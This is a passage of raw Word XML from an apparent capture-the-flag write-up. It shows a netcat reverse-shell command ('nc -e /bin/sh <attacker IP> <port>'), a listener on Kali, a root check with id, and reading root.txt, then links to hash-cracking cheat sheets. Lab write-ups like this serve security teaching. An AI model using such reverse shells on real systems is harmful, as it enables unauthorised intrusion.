        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A1DC2">
        <w:t xml:space="preserve"> -e /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A1DC2">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A1DC2">
        <w:t xml:space="preserve"> &lt;attacker IP&gt; &lt;port&gt;’</w:t>
      </w:r>
      <w:r w:rsidR="00DC691F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A80596E" w14:textId="38014E9D" w:rsidR="00560496" w:rsidRDefault="00FC70A7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251693056" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3794F558" wp14:editId="21CFDB4D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>213701</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="186944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51" y="20945"/>
                <wp:lineTo x="21351" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="62250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689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96">
        <w:t xml:space="preserve">Before you run it, make sure you have </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00560496">
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00560496">
        <w:t xml:space="preserve"> listening on your kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7D8BAC" w14:textId="7F2B379C" w:rsidR="00FC70A7" w:rsidRDefault="00FC70A7"/>
    <w:p w14:paraId="62F95407" w14:textId="3B57BBDC" w:rsidR="00FC70A7" w:rsidRDefault="001B7C36">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251695104" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="075804B0" wp14:editId="50AF2784">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3431</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3916680" cy="825500"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20935"/>
                <wp:lineTo x="21537" y="20935"/>
                <wp:lineTo x="21537" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="7720104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0439" name="Picture 1" descr="A screenshot of a computer cod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50" cy="82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7EF2" w14:textId="2AAC9EE0" w:rsidR="00FC70A7" w:rsidRDefault="00FC70A7"/>
    <w:p w14:paraId="2A14D35D" w14:textId="77777777" w:rsidR="00FC70A7" w:rsidRDefault="00FC70A7"/>
    <w:p w14:paraId="1F1FACC2" w14:textId="44CDCC6D" w:rsidR="00B7583C" w:rsidRDefault="008E58F4">
      <w:r>
        <w:t>Now that we are in, we can run the id command to see if we have root privileges.</w:t>
      </w:r>
      <w:r w:rsidR="0027478E">
        <w:t xml:space="preserve"> Since we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0027478E">
        <w:t>do</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0027478E">
        <w:t xml:space="preserve"> we can then go into the root directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B9E89A" w14:textId="77777777" w:rsidR="00FC70A7" w:rsidRDefault="00FC70A7"/>
    <w:p w14:paraId="151777A0" w14:textId="4148B9D2" w:rsidR="00C0561A" w:rsidRDefault="00E737AE" w:rsidP="0094201D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc144148385"/>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00547286">
        <w:t>he Flag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="202D0AD8" w14:textId="3A9A4928" w:rsidR="00547286" w:rsidRDefault="00547286">
      <w:r>
        <w:t>Once we are in root, we can then go into the root directory and ls the contents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0875752B" w14:textId="3CC7A276" w:rsidR="008B717D" w:rsidRDefault="00A9698B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251692032" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5AE44A37" wp14:editId="1997A2FB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>179108</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="2256155"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21339"/>
                <wp:lineTo x="21538" y="21339"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="16004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78067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687">
        <w:t xml:space="preserve">Finding </w:t>
      </w:r>
      <w:r w:rsidR="007D204E">
        <w:t xml:space="preserve">root </w:t>
      </w:r>
      <w:r w:rsidR="004E212B">
        <w:t xml:space="preserve">text </w:t>
      </w:r>
      <w:r w:rsidR="007D204E">
        <w:t>file,</w:t>
      </w:r>
      <w:r w:rsidR="00832687">
        <w:t xml:space="preserve"> we can then do ‘cat root.txt’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3BA6CA" w14:textId="0561EDA2" w:rsidR="00C0561A" w:rsidRDefault="0073642B">
      <w:r>
        <w:t>We now have the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7380B870" w14:textId="77777777" w:rsidR="00C0561A" w:rsidRDefault="00C0561A"/>
    <w:p w14:paraId="59DD39D8" w14:textId="77777777" w:rsidR="00C0561A" w:rsidRDefault="00C0561A"/>
    <w:p w14:paraId="59E3BFC6" w14:textId="35E5C6C1" w:rsidR="006A5497" w:rsidRDefault="006A5497" w:rsidP="00D06192">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc144148386"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Additional Resources</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="69C90632" w14:textId="4DE3DF7D" w:rsidR="00443457" w:rsidRDefault="005443C7">
      <w:r w:rsidRPr="001264D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HASHES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="005443C7">
        <w:t>https://gist.github.com/dwallraff/6a50b5d2649afeb1803757560c176401</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695FDF0D" w14:textId="56E7EB35" w:rsidR="00443457" w:rsidRDefault="00BF752A">
      <w:r w:rsidRPr="001264D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>M Finder</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF752A">
        <w:t>https://github.com/frizb/Hashcat-Cheatsheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C78C93" w14:textId="0D688A72" w:rsidR="00443457" w:rsidRDefault="00443457"/>
    <w:p w14:paraId="7E93DCE0" w14:textId="098D76B0" w:rsidR="00443457" w:rsidRDefault="00443457"/>
    <w:p w14:paraId="130EF46A" w14:textId="3FC33C02" w:rsidR="00443457" w:rsidRDefault="00443457"/>
    <w:p w14:paraId="3FE1E6BA" w14:textId="585D4AC8" w:rsidR="00443457" w:rsidRDefault="00443457"/>
    <w:p w14:paraId="0E0AB300" w14:textId="4B81C065" w:rsidR="00443457" w:rsidRDefault="00443457"/>
    <w:p w14:paraId="4BBEC1C6" w14:textId="701CB606" w:rsidR="00443457" w:rsidRDefault="00443457"/>
    <w:p w14:paraId="187FF001" w14:textId="7F271885" w:rsidR="00443457" w:rsidRDefault="00443457"/>
    <w:p w14:paraId="19E4B56F" w14:textId="76111466" w:rsidR="00443457" w:rsidRDefault="00443457"/>
    <w:p w14:paraId="08488C49" w14:textId="623A907A" w:rsidR="00443457" w:rsidRDefault="00443457"/>
    <w:p w14:paraId="7BC58EDB" w14:textId="65064F08" w:rsidR="00443457" w:rsidRDefault="00443457"/>
    <w:p w14:paraId="3E12E044" w14:textId="75325BEE" w:rsidR="00443457" w:rsidRDefault="00443457"/>
    <w:p w14:paraId="27FDA163" w14:textId="48252A68" w:rsidR="00443457" w:rsidRDefault="00443457"/>
    <w:p w14:paraId="54D8B0A5" w14:textId="17FD941E" w:rsidR="00443457" w:rsidRDefault="00443457"/>
    <w:p w14:paraId="76280522" w14:textId="7859D911" w:rsidR="00443457" w:rsidRDefault="00443457"/>
    <w:p w14:paraId="29E95AC9" w14:textId="784CA35D" w:rsidR="00443457" w:rsidRDefault="00443457"/>
    <w:p w14:paraId="2F241887" w14:textId="16CDC2B2" w:rsidR="00443457" w:rsidRDefault="00443457"/>
    <w:p w14:paraId="6EB2DD5C" w14:textId="5EE30330" w:rsidR="00443457" w:rsidRDefault="00443457"/>
    <w:p w14:paraId="45FE3083" w14:textId="4397F6E5" w:rsidR="00443457" w:rsidRDefault="00443457"/>
    <w:p w14:paraId="37E778D9" w14:textId="4613E583" w:rsidR="00443457" w:rsidRDefault="00443457"/>
    <w:p w14:paraId="0458B3C7" w14:textId="59F57CF5" w:rsidR="00443457" w:rsidRDefault="00443457"/>
    <w:p w14:paraId="39C7AE87" w14:textId="3C7F3D9F" w:rsidR="00443457" w:rsidRDefault="00443457"/>
    <w:p w14:paraId="786BC8A9" w14:textId="59FDFBAC" w:rsidR="00443457" w:rsidRDefault="00443457"/>
    <w:p w14:paraId="7FACCE1F" w14:textId="236C76E5" w:rsidR="00443457" w:rsidRDefault="00443457"/>
    <w:p w14:paraId="1319FDF2" w14:textId="672FDCB7" w:rsidR="00443457" w:rsidRDefault="00443457"/>
    <w:p w14:paraId="32335457" w14:textId="76374ABE" w:rsidR="00443457" w:rsidRDefault="00443457"/>
    <w:p w14:paraId="423B639E" w14:textId="7B698354" w:rsidR="00443457" w:rsidRDefault="00443457"/>
    <w:p w14:paraId="19E0330A" w14:textId="77777777" w:rsidR="00443457" w:rsidRDefault="00443457"/>
    <w:sectPr w:rsidR="00443457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03F5" w14:textId="77777777" w:rsidR="00F90904" w:rsidRDefault="00F90904" w:rsidP="00F50EB2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4421C78A" w14:textId="77777777" w:rsidR="00F90904" w:rsidRDefault="00F90904" w:rsidP="00F5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61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246D5E" w14:textId="72FA7071" w:rsidR="00F50EB2" w:rsidRDefault="00F50E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4ADD6" w14:textId="77777777" w:rsidR="00F50EB2" w:rsidRDefault="00F5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3B5C" w14:textId="77777777" w:rsidR="00F90904" w:rsidRDefault="00F90904" w:rsidP="00F50EB2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7169D5DC" w14:textId="77777777" w:rsidR="00F90904" w:rsidRDefault="00F90904" w:rsidP="00F50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6"/>
    <w:rsid w:val="0005051B"/>
    <w:rsid w:val="000735CE"/>
    <w:rsid w:val="00086F8D"/>
    <w:rsid w:val="000C0231"/>
    <w:rsid w:val="000E44DB"/>
    <w:rsid w:val="000E7CA4"/>
    <w:rsid w:val="000F102A"/>
    <w:rsid w:val="0010298F"/>
    <w:rsid w:val="001164DF"/>
    <w:rsid w:val="00116BAF"/>
    <w:rsid w:val="00123BBA"/>
    <w:rsid w:val="001264D1"/>
    <w:rsid w:val="00126AFD"/>
    <w:rsid w:val="00150E94"/>
    <w:rsid w:val="0015521F"/>
    <w:rsid w:val="001B7C36"/>
    <w:rsid w:val="001C24D4"/>
    <w:rsid w:val="001D64C3"/>
    <w:rsid w:val="001E3693"/>
    <w:rsid w:val="001E6212"/>
    <w:rsid w:val="001F4223"/>
    <w:rsid w:val="00202117"/>
    <w:rsid w:val="00223901"/>
    <w:rsid w:val="00232BEA"/>
    <w:rsid w:val="00237A78"/>
    <w:rsid w:val="00243BD7"/>
    <w:rsid w:val="00246122"/>
    <w:rsid w:val="00264638"/>
    <w:rsid w:val="0027478E"/>
    <w:rsid w:val="002F58E0"/>
    <w:rsid w:val="00301156"/>
    <w:rsid w:val="003330F1"/>
    <w:rsid w:val="00357276"/>
    <w:rsid w:val="003A1766"/>
    <w:rsid w:val="003B3DE1"/>
    <w:rsid w:val="0040718A"/>
    <w:rsid w:val="004072E6"/>
    <w:rsid w:val="00407DED"/>
    <w:rsid w:val="00413340"/>
    <w:rsid w:val="00443457"/>
    <w:rsid w:val="004559A8"/>
    <w:rsid w:val="0045764F"/>
    <w:rsid w:val="00461891"/>
    <w:rsid w:val="004830C5"/>
    <w:rsid w:val="00491C7D"/>
    <w:rsid w:val="004C5630"/>
    <w:rsid w:val="004E212B"/>
    <w:rsid w:val="00512ADA"/>
    <w:rsid w:val="005141D5"/>
    <w:rsid w:val="00521728"/>
    <w:rsid w:val="0053663D"/>
    <w:rsid w:val="0054210F"/>
    <w:rsid w:val="005443C7"/>
    <w:rsid w:val="00544FF8"/>
    <w:rsid w:val="00547286"/>
    <w:rsid w:val="00554E46"/>
    <w:rsid w:val="00555981"/>
    <w:rsid w:val="00560496"/>
    <w:rsid w:val="00584B76"/>
    <w:rsid w:val="005A7FF5"/>
    <w:rsid w:val="005B57A0"/>
    <w:rsid w:val="005D3FA7"/>
    <w:rsid w:val="005E5BAF"/>
    <w:rsid w:val="005F39A7"/>
    <w:rsid w:val="005F4DEE"/>
    <w:rsid w:val="005F7D0D"/>
    <w:rsid w:val="0061550A"/>
    <w:rsid w:val="0063434E"/>
    <w:rsid w:val="00636C38"/>
    <w:rsid w:val="00687FD0"/>
    <w:rsid w:val="006A5497"/>
    <w:rsid w:val="006B2E05"/>
    <w:rsid w:val="006C11EE"/>
    <w:rsid w:val="006C1BA2"/>
    <w:rsid w:val="006E1BF0"/>
    <w:rsid w:val="0070051B"/>
    <w:rsid w:val="0070265E"/>
    <w:rsid w:val="00720325"/>
    <w:rsid w:val="0073642B"/>
    <w:rsid w:val="007414DA"/>
    <w:rsid w:val="007753DB"/>
    <w:rsid w:val="007A3831"/>
    <w:rsid w:val="007B3129"/>
    <w:rsid w:val="007C5082"/>
    <w:rsid w:val="007C6564"/>
    <w:rsid w:val="007D204E"/>
    <w:rsid w:val="007E0753"/>
    <w:rsid w:val="007F653E"/>
    <w:rsid w:val="007F7E9E"/>
    <w:rsid w:val="00820BE9"/>
    <w:rsid w:val="00832687"/>
    <w:rsid w:val="0085109A"/>
    <w:rsid w:val="00862AD1"/>
    <w:rsid w:val="0087222F"/>
    <w:rsid w:val="008B717D"/>
    <w:rsid w:val="008C7FE6"/>
    <w:rsid w:val="008E3376"/>
    <w:rsid w:val="008E58F4"/>
    <w:rsid w:val="008E7FA2"/>
    <w:rsid w:val="00921B5F"/>
    <w:rsid w:val="00923BB7"/>
    <w:rsid w:val="00930D28"/>
    <w:rsid w:val="0094201D"/>
    <w:rsid w:val="0097457F"/>
    <w:rsid w:val="009A1DC2"/>
    <w:rsid w:val="009C36D6"/>
    <w:rsid w:val="00A426C6"/>
    <w:rsid w:val="00A52F9F"/>
    <w:rsid w:val="00A92663"/>
    <w:rsid w:val="00A9698B"/>
    <w:rsid w:val="00AB2D49"/>
    <w:rsid w:val="00AE13CB"/>
    <w:rsid w:val="00B145A6"/>
    <w:rsid w:val="00B6648D"/>
    <w:rsid w:val="00B7583C"/>
    <w:rsid w:val="00B97003"/>
    <w:rsid w:val="00BA2D0F"/>
    <w:rsid w:val="00BA7FA2"/>
    <w:rsid w:val="00BC521A"/>
    <w:rsid w:val="00BD5298"/>
    <w:rsid w:val="00BE2F2F"/>
    <w:rsid w:val="00BF752A"/>
    <w:rsid w:val="00C002DB"/>
    <w:rsid w:val="00C02797"/>
    <w:rsid w:val="00C04B12"/>
    <w:rsid w:val="00C0561A"/>
    <w:rsid w:val="00C10D20"/>
    <w:rsid w:val="00C32DEF"/>
    <w:rsid w:val="00C740A9"/>
    <w:rsid w:val="00C94F8C"/>
    <w:rsid w:val="00CB1746"/>
    <w:rsid w:val="00CC08E1"/>
    <w:rsid w:val="00CE46C6"/>
    <w:rsid w:val="00CE51D0"/>
    <w:rsid w:val="00CF7BBA"/>
    <w:rsid w:val="00D06192"/>
    <w:rsid w:val="00D4481B"/>
    <w:rsid w:val="00D45FD4"/>
    <w:rsid w:val="00D61644"/>
    <w:rsid w:val="00D84664"/>
    <w:rsid w:val="00D854C8"/>
    <w:rsid w:val="00D97374"/>
    <w:rsid w:val="00DC691F"/>
    <w:rsid w:val="00E306E9"/>
    <w:rsid w:val="00E50A97"/>
    <w:rsid w:val="00E60CDA"/>
    <w:rsid w:val="00E63BD0"/>
    <w:rsid w:val="00E737AE"/>
    <w:rsid w:val="00EB2617"/>
    <w:rsid w:val="00ED6E18"/>
    <w:rsid w:val="00F254F2"/>
    <w:rsid w:val="00F258FB"/>
    <w:rsid w:val="00F26998"/>
    <w:rsid w:val="00F30580"/>
    <w:rsid w:val="00F50EB2"/>
    <w:rsid w:val="00F7102C"/>
    <w:rsid w:val="00F90904"/>
    <w:rsid w:val="00FC2B54"/>
    <w:rsid w:val="00FC70A7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E97CF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BCA2F201-7FFE-4D3F-A14A-F8F8D274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0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E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EB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5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EB2"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F5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EB2"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="006E1B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3B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B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F711-A13C-45C3-B66D-2CE10CA6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qlmap; hashcat; john; exim4</cp:keywords>
  <dc:description/>
  <cp:lastModifiedBy>Michael Vasilio</cp:lastModifiedBy>
  <cp:revision>199</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-08-27T11:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-28T12:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>